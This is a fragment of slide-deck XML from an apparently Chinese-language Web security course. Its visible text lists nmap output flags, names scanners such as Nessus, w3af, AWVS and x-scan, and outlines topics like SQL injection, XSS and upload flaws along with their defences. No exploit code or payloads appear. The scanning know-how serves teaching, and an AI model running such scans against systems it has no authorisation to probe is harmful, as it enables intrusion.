                <a:sym typeface="Helvetica Light"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>-p 选择端口</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3" indent="685800" algn="l">
              <a:defRPr sz="1800">
                <a:latin typeface="Helvetica Light"/>
                <a:ea typeface="Helvetica Light"/>
                <a:cs typeface="Helvetica Light"/>
                <a:sym typeface="Helvetica Light"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>-oN 普通输出</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3" indent="685800" algn="l">
              <a:defRPr sz="1800">
                <a:latin typeface="Helvetica Light"/>
                <a:ea typeface="Helvetica Light"/>
                <a:cs typeface="Helvetica Light"/>
                <a:sym typeface="Helvetica Light"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>-oX XML文件输出</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3" indent="685800" algn="l">
              <a:defRPr sz="1800">
                <a:latin typeface="Helvetica Light"/>
                <a:ea typeface="Helvetica Light"/>
                <a:cs typeface="Helvetica Light"/>
                <a:sym typeface="Helvetica Light"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>-oG GREPable输出</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3" indent="685800" algn="l">
              <a:defRPr sz="1800">
                <a:latin typeface="Helvetica Light"/>
                <a:ea typeface="Helvetica Light"/>
                <a:cs typeface="Helvetica Light"/>
                <a:sym typeface="Helvetica Light"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>-oS 脚本小子输出</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="117" name="image16.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1536700" y="4070350"/>
            <a:ext cx="9931400" cy="1612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14"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="114"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="0-#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="8" dur="10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16"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="13" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="116"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="0-#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="14"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115"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="19" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="115"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="0-#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="20" dur="10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17"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="25" dur="800" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="117"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="26" dur="800" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1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 grpId="4"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="114" grpId="1"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="116" grpId="2"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="115" grpId="3"/>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image17.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="329599" y="2516186"/>
            <a:ext cx="12352340" cy="5888039"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="120" name="Shape 120"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5619750" y="838992"/>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扫描报告</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="121" name="Shape 121"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="322861" y="1658143"/>
            <a:ext cx="355201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atin typeface="Helvetica Light"/>
                <a:ea typeface="Helvetica Light"/>
                <a:cs typeface="Helvetica Light"/>
                <a:sym typeface="Helvetica Light"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>图为Nessus扫描报告</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0"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="120"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="0-#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="8" dur="10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119"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="blinds(vertical)" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="17"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0" grpId="1"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="121" grpId="2"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="119" grpId="3"/>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nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2075453" y="1291828"/>
            <a:ext cx="245150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w3af扫描器</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="124" name="image18.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2082800" y="2170906"/>
            <a:ext cx="8253414" cy="6024563"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="125" name="Shape 125"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="546098" y="412749"/>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常见的一些综合扫描工具</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5"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="125"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="0-#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="8"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23"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="13" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="123"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="0-#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="14" dur="10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5" presetID="3" grpId="3" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="18" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="124"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="blinds(vertical)" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="19" dur="2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 grpId="3"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="125" grpId="1"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="123"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title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="530225" y="444500"/>
            <a:ext cx="11099800" cy="2159000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="6900"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>概要</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="Shape 35"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1663700" y="1911350"/>
            <a:ext cx="11099800" cy="6286500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="281876" indent="-281876" defTabSz="369506">
              <a:spcBef>
                <a:spcPts val="2500"/>
              </a:spcBef>
              <a:defRPr b="1" sz="2200">
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>什么是Web安全</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="281876" indent="-281876" defTabSz="369506">
              <a:spcBef>
                <a:spcPts val="2500"/>
              </a:spcBef>
              <a:defRPr b="1" sz="2200">
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>从一个真实的案例来讲Web攻击流程</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="281876" indent="-281876" defTabSz="369506">
              <a:spcBef>
                <a:spcPts val="2500"/>
              </a:spcBef>
              <a:defRPr b="1" sz="2200">
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>网站扫描技术</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="281876" indent="-281876" defTabSz="369506">
              <a:spcBef>
                <a:spcPts val="2500"/>
              </a:spcBef>
              <a:defRPr b="1" sz="2200">
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>SQL注入漏洞及防范</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="281876" indent="-281876" defTabSz="369506">
              <a:spcBef>
                <a:spcPts val="2500"/>
              </a:spcBef>
              <a:defRPr b="1" sz="2200">
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>跨站脚本漏洞及防范</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="281876" indent="-281876" defTabSz="369506">
              <a:spcBef>
                <a:spcPts val="2500"/>
              </a:spcBef>
              <a:defRPr b="1" sz="2200">
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>上传漏洞及防范</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="281876" indent="-281876" defTabSz="369506">
              <a:spcBef>
                <a:spcPts val="2500"/>
              </a:spcBef>
              <a:defRPr b="1" sz="2200">
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>登陆安全隐患及防范</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="281876" indent="-281876" defTabSz="369506">
              <a:spcBef>
                <a:spcPts val="2500"/>
              </a:spcBef>
              <a:defRPr b="1" sz="2200">
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>拒绝服务漏洞及防范</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="281876" indent="-281876" defTabSz="369506">
              <a:spcBef>
                <a:spcPts val="2500"/>
              </a:spcBef>
              <a:defRPr b="1" sz="2200">
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>写在最后</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nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1110303" y="1933178"/>
            <a:ext cx="16386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Nessus</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="128" name="Shape 128"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="546098" y="412749"/>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常见的一些综合扫描工具</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="129" name="image19.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1106624" y="2641600"/>
            <a:ext cx="10791553" cy="61297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8"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="128"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="0-#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="8" dur="10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27"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="13" dur="1500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="127"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="0-#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="14" dur="15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5" presetID="3" grpId="3" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="18" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="129"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="blinds(vertical)" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="19"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3"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="128" grpId="1"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="127" grpId="2"/>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nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1821605" y="1768078"/>
            <a:ext cx="11558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awvs</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="132" name="Shape 132"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="546098" y="412749"/>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常见的一些综合扫描工具</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="133" name="image20.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1698978" y="2601928"/>
            <a:ext cx="10177041" cy="65181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32"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="132"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="0-#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="8" dur="10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31"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="13" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="131"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="0-#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="14"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5" presetID="3" grpId="3" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="18" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="133"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="blinds(vertical)" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="19"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1"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="133" grpId="3"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="131"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nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1186427" y="1298574"/>
            <a:ext cx="2705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Helvetica Light"/>
                <a:ea typeface="Helvetica Light"/>
                <a:cs typeface="Helvetica Light"/>
                <a:sym typeface="Helvetica Light"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>x-scan</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400"/>
              <a:t>（经典）</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="136" name="Shape 136"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="546098" y="412749"/>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常见的一些综合扫描工具</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="137" name="image21.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2616200" y="1873250"/>
            <a:ext cx="7531100" cy="6007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36"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="136"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="0-#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="8" dur="1000" fill="hold"/>
                                        <p:tgtEl>
